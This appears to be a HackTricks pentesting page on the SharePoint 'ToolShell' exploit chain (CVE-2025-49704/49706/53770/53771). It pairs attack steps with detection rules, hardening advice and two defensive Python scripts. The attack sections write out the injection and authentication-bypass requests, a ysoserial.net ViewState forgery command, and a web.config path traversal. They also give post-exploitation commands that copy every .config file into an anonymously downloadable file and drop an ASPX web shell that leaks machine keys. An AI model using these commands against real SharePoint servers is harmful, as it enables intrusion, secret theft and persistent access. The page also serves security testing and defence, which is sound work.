Microsoft SharePoint - Pentesting & Exploitation
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Microsoft SharePoint (on-premises) is built on top of ASP.NET/IIS. Most of the classic web attack surface (ViewState, Web.Config, web shells, etc.) is therefore present, but SharePoint also ships with hundreds of proprietary ASPX pages and web services that dramatically enlarge the exposed attack surface. This page collects practical tricks to enumerate, exploit and persist inside SharePoint environments with emphasis on the 2025 exploit chain disclosed by Unit42 (CVE-2025-49704/49706/53770/53771).
1. Quick enumeration
```bash
# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -   # returns WCF/XSI
# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"
# interesting standard paths
/_layouts/15/ToolPane.aspx   # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx   # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx
# enumerate sites & site-collections (requires at least Anonymous)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>
```
2. 2025 exploit chain (a.k.a. "ToolShell")
2.1 CVE-2025-49704 - Code Injection on ToolPane.aspx
```
/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload>
```
allows arbitrary Server-Side Include code to be injected in the page, which is later compiled by ASP.NET. An attacker can embed C# that executes Process.Start() and drop a malicious ViewState.
2.2 CVE-2025-49706 - Improper Authentication Bypass
The same page trusts the X-Forms_BaseUrl header to determine the site context. By pointing it to /_layouts/15/, MFA/SSO enforced at the root site can be bypassed unauthenticated.
2.3 CVE-2025-53770 - Unauthenticated ViewState Deserialization → RCE
Once the attacker controls a gadget in ToolPane.aspx they can post an unsigned (or MAC-only) __VIEWSTATE value that triggers .NET deserialization inside w3wp.exe, leading to code execution.
If signing is enabled, steal the ValidationKey/DecryptionKey from any web.config (see 2.4) and forge the payload with ysoserial.net or ysodom:
```
ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt
```
For an in-depth explanation on abusing ASP.NET ViewState read: {{#ref}} ../../pentesting-web/deserialization/exploiting-__viewstate-parameter.md {{#endref}}
2.4 CVE-2025-53771 - Path Traversal / web.config Disclosure
Sending a crafted Source parameter to ToolPane.aspx (e.g. ../../../../web.config) returns the targeted file, allowing leakage of:
- <machineKey validationKey="…" decryptionKey="…"> → forge ViewState / ASPXAUTH cookies
- connection strings & secrets.
3. Post-exploitation recipes observed in the wild
3.1 Exfiltrate every .config file (variation-1)
```
cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"
```
The resulting debug_dev.js can be downloaded anonymously and contains all sensitive configuration.
3.2 Deploy a Base64-encoded ASPX web shell (variation-2)
```
powershell.exe -EncodedCommand <base64>
```
Decoded payload example (shortened):
```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e){
        Response.Write(MachineKey.ValidationKey);
        // echo secrets or invoke cmd
    }
</script>
```
Written to: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
The shell exposes endpoints to read / rotate machine keys which allows forging ViewState and ASPXAUTH cookies across the farm.
3.3 Obfuscated variant (variation-3)
Same shell but:
- dropped under ...\15\TEMPLATE\LAYOUTS\
- variable names reduced to single letters
- Thread.Sleep(<ms>) added for sandbox-evasion & timing-based AV bypass.
4. Detection ideas
| Telemetry | Why it is suspicious |
|---|---|
| w3wp.exe → cmd.exe | Worker process should rarely spawn a shell |
| cmd.exe → powershell.exe -EncodedCommand | Classic LOLBin pattern |
| File events creating debug_dev.js or spinstall0.aspx | IOCs straight from ToolShell |
| ProcessCmdLine CONTAINS ToolPane.aspx (ETW/Module logs) | Public PoCs invoke this page |

Example XDR / Sysmon rule (pseudo-XQL):
```
proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powershell.exe")
```
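The table above applied to process-creation and file-creation telemetry, as an added example that is not part of the original page: it evaluates the four detection ideas over constructed Sysmon-style events (field names follow Sysmon; all values are invented), and generalises the file-drop rule to any new .aspx under a LAYOUTS directory so the ...\15\ variant from 3.3 is covered too.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 11 = file create);
# field names follow Sysmon, every value below is invented for this demo.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand <base64>"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

SHELLS = {"cmd.exe", "powershell.exe"}
TOOLSHELL_FILES = {"debug_dev.js", "spinstall0.aspx"}
LAYOUTS_RE = re.compile(r"\\web server extensions\\1[56]\\template\\layouts\\", re.I)
ENCODED_RE = re.compile(r"\s-e(?:c|nc|ncodedcommand)?(?=\s|$)", re.I)  # -e / -ec / -enc / -EncodedCommand

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(event: dict) -> list:
    """Return the names of the rules this event matches; [] means nothing fired."""
    hits = []
    if event["EventID"] == 1:
        parent, image = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
        cmdline = event.get("CommandLine", "")
        if parent == "w3wp.exe" and image in SHELLS:          # IIS worker process spawning a shell
            hits.append("w3wp_spawns_shell")
        if parent == "cmd.exe" and image == "powershell.exe" and ENCODED_RE.search(cmdline):
            hits.append("cmd_to_encoded_powershell")          # LOLBin chain from section 3.2
        if "toolpane.aspx" in cmdline.lower():                 # public PoCs reference this page
            hits.append("toolpane_in_cmdline")
    elif event["EventID"] == 11:
        target = event.get("TargetFilename", "")
        name = basename(target)
        # known ToolShell drop names, plus any new .aspx under LAYOUTS (covers the ...\15\ variant)
        if name in TOOLSHELL_FILES or (LAYOUTS_RE.search(target) and name.endswith(".aspx")):
            hits.append("layouts_file_drop")
    return hits

def scan(events: list) -> dict:
    """Map event index -> rule hits for every event that fired at least one rule."""
    return {i: hits for i, event in enumerate(events) if (hits := detect(event))}
```

Expect the .aspx-under-LAYOUTS rule to fire during legitimate SharePoint patching as well, so baseline it against change windows before alerting on it.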
5. Hardening & Mitigation
- Patch: the July 2025 security updates fix all four CVEs.
- Rotate every <machineKey> and ViewState secret after compromise.
- Remove LAYOUTS write permission from the WSS_WPG & WSS_ADMIN_WPG groups.
- Block external access to /_layouts/15/ToolPane.aspx at proxy/WAF level.
- Enable ViewStateUserKey, ViewState MAC and custom EventValidation.
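A defender-side check for the machineKey/ViewState bullets above, added here as an example that is not part of the original page: it audits a web.config fragment for auto-generated or weak machineKey settings and for ViewState MAC/encryption/EventValidation being off. Both fragments are constructed, and the hardened one uses placeholder key values.

```python
import xml.etree.ElementTree as ET

# Constructed web.config fragments (not a real SharePoint file). In a farm the keys must be
# explicit, identical on every WFE and rotated after any compromise; the values are placeholders.
WEAK_CONFIG = """<configuration><system.web>
  <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps"
              validation="SHA1" decryption="3DES" />
  <pages enableViewStateMac="false" viewStateEncryptionMode="Auto" enableEventValidation="false" />
</system.web></configuration>"""

HARDENED_CONFIG = """<configuration><system.web>
  <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY_HEX" decryptionKey="PLACEHOLDER_DECRYPTION_KEY_HEX"
              validation="HMACSHA256" decryption="AES" />
  <pages enableViewStateMac="true" viewStateEncryptionMode="Always" enableEventValidation="true" />
</system.web></configuration>"""

WEAK_ALGOS = {"MD5", "SHA1", "3DES", "DES"}

def audit_web_config(xml_text: str) -> list:
    """Return a list of findings; an empty list means every check in this example passed."""
    root = ET.fromstring(xml_text)
    findings = []
    mk = next(root.iter("machineKey"), None)
    if mk is None:
        findings.append("machineKey missing: keys are auto-generated per machine, so ViewState differs across WFEs")
    else:
        for attr in ("validationKey", "decryptionKey"):
            if mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(f"machineKey {attr} is AutoGenerate: set an explicit farm-wide key")
        if mk.get("validation", "").upper() in WEAK_ALGOS:
            findings.append(f"machineKey validation={mk.get('validation')}: use HMACSHA256 or stronger")
        if mk.get("decryption", "").upper() in WEAK_ALGOS:
            findings.append(f"machineKey decryption={mk.get('decryption')}: use AES")
    pages = next(root.iter("pages"), None)
    attrs = pages.attrib if pages is not None else {}   # ASP.NET defaults apply when absent
    if attrs.get("enableViewStateMac", "true").lower() != "true":
        findings.append("pages enableViewStateMac is not true")
    if attrs.get("viewStateEncryptionMode", "Auto") != "Always":
        findings.append("pages viewStateEncryptionMode should be Always")
    if attrs.get("enableEventValidation", "true").lower() != "true":
        findings.append("pages enableEventValidation is not true")
    return findings
```

ViewStateUserKey is set per page in code (Page.ViewStateUserKey), so it cannot be verified from web.config alone.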
Related tricks
- IIS post-exploitation & web.config abuse:
{{#ref}} ../../network-services-pentesting/pentesting-web/iis-internet-information-services.md {{#endref}}
References
- Unit42 - Active Exploitation of Microsoft SharePoint Vulnerabilities
- GitHub PoC - ToolShell exploit chain
- Microsoft Security Advisory - CVE-2025-49704 / 49706
- Microsoft Security Advisory - CVE-2025-53770 / 53771